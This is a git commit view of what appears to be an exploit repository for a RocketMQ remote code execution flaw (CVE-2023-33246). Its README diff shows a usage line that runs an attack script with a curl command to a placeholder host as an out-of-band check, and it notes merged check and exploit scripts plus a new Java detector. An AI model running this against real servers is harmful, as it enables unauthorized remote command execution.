add java based rocketMQ RCE CVE-2023-33246

This commit is contained in:
helloexp 2023-07-19 14:58:32 +08:00
parent 95d4f6d0a3
commit 7a7a360a08
2 changed files with 3 additions and 1 deletions

View File

@ -19,4 +19,6 @@ python check.py --file test.txt --attack --command "curl x.x.x.x"
``` ```
利用带外显示结果 利用带外显示结果
重新优化check 和exp 脚本,合并功能 ## 更新记录
1. 重新优化check 和exp 脚本,合并功能
2. 添加java 版本的检测程序